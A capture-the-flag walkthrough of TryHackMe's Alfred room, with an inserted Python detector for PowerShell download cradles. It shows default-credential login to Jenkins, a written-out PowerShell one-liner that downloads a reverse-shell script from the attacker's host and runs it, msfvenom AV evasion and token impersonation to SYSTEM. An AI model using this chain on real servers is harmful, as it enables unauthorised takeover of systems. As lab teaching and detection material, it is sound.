Hello everyone, I hope you are doing well. In this post I will be sharing my walkthrough of TryHackMe's Alfred room. This was an easy Windows machine where you log into the admin portal by guessing the credentials (which was quite simple), then find where you can execute system commands to get a reverse shell, and from there see how you can escalate to SYSTEM.

Rustscan

PORT     STATE SERVICE    REASON          VERSION   
80/tcp   open  http       syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:                                                    
|   Supported Methods: OPTIONS TRACE GET HEAD POST                        
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5      
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped syn-ack ttl 127  
8080/tcp open  http       syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT        
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1     
| http-robots.txt: 1 disallowed entry                                     
|_/                                                                       
|_http-server-header: Jetty(9.4.z-SNAPSHOT)                               
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

Here we don't see anything interesting, so let's move to the other HTTP port.

PORT 8080 (HTTP)

We can see the Jenkins login portal, so let's try the default credentials:

admin:password

That didn't work, so let's try admin:admin

This worked and we are in. Now we need to find where we can execute commands so we can get a reverse shell on the target machine.

Hover over the project and you'll get a dropdown menu.

You'll have options like "Changes", "Workspace", "Build Now", "Delete Project", "Configure" and "Rename". Select `Configure`.

Switch to the Build Environment tab.

Here you can see that the command whoami is already written in the build step, so click Apply and then Save.

Click on build #2, then Console Output.

As you can see, whatever command we put in that build step has its output shown in the console. So what we can do now is host a PowerShell reverse shell script, download it using PowerShell, and execute the function in the script to get a shell:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
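From the defender's side, the build-step command above is a classic in-memory download cradle (DownloadString piped into iex) followed by the Nishang reverse-shell function. The following is an added detection example, not code from the original post: it scores constructed PowerShell script-block log lines (Event ID 4104 style) and Jenkins console lines against those patterns. The sample lines, hosts and paths are all made up for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed sample lines (not from the original post): two benign, two that
# carry the cradle pattern used in the walkthrough.
SAMPLE_LINES = [
    "4104 ScriptBlockText: Get-ChildItem C:\\Users",
    "4104 ScriptBlockText: iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444",
    "jenkins-console: [project] $ powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/x.ps1')",
    "4104 ScriptBlockText: Invoke-WebRequest -Uri https://updates.example.com/patch.msi -OutFile C:\\patch.msi",
]

# Heuristic rules derived from the command shown in the post.
RULES = {
    # String download into memory (never touches disk).
    "download_cradle": re.compile(r"\.DownloadString\s*\(", re.IGNORECASE),
    # Inline execution of the downloaded text; iex is the alias of Invoke-Expression.
    "inline_exec": re.compile(r"(?<![\w-])(iex|Invoke-Expression)(?![\w-])", re.IGNORECASE),
    # Known reverse-shell function name / reverse flag.
    "reverse_shell": re.compile(r"Invoke-PowerShellTcp|-Reverse\b", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


@dataclass
class Finding:
    line: str
    rules: list      # names of the rules that matched, in RULES order
    urls: list       # any URLs pulled from the line, useful as IoCs for the responder
    severity: str    # "none", "medium" or "high"


def score(rules):
    # Cradle plus in-memory execution is the full pattern from the post;
    # any single indicator alone is still worth a look.
    if "download_cradle" in rules and "inline_exec" in rules:
        return "high"
    if rules:
        return "medium"
    return "none"


def analyze(line):
    rules = [name for name, rx in RULES.items() if rx.search(line)]
    return Finding(line=line, rules=rules, urls=URL_RE.findall(line), severity=score(rules))


def scan(lines):
    """Return only the findings that matched at least one rule."""
    return [f for f in (analyze(l) for l in lines) if f.severity != "none"]


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f.severity, f.rules, f.urls)
```

The benign Invoke-WebRequest line is deliberately not flagged: writing a file to disk is a different (and more visible) pattern than executing a downloaded string in memory.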

Start your python3 HTTP server.

Our command will look like this. Then start a netcat listener.

Now click on Build Now. The job will run and you'll get a shell.

Generate an msfvenom payload with encoders to bypass AV.

Host it on your local machine and download it onto the target by repeating the same method.

Set up your Metasploit listener.

Execute the payload and you'll see a Meterpreter session pop up.

Running the command getprivs, we can see what privileges we have on the machine.

Here we can escalate our privileges through SeImpersonatePrivilege.

Run the command load incognito; through this module we can impersonate tokens.

Now, even though we have SYSTEM on the machine, we still won't be able to access system files, because Windows uses the primary token of the process and not the impersonated token. So we need to migrate to a process running as SYSTEM, which is services.exe.

Then type shell to get a command prompt and navigate to C:\Windows\System32\config to get the root flag.
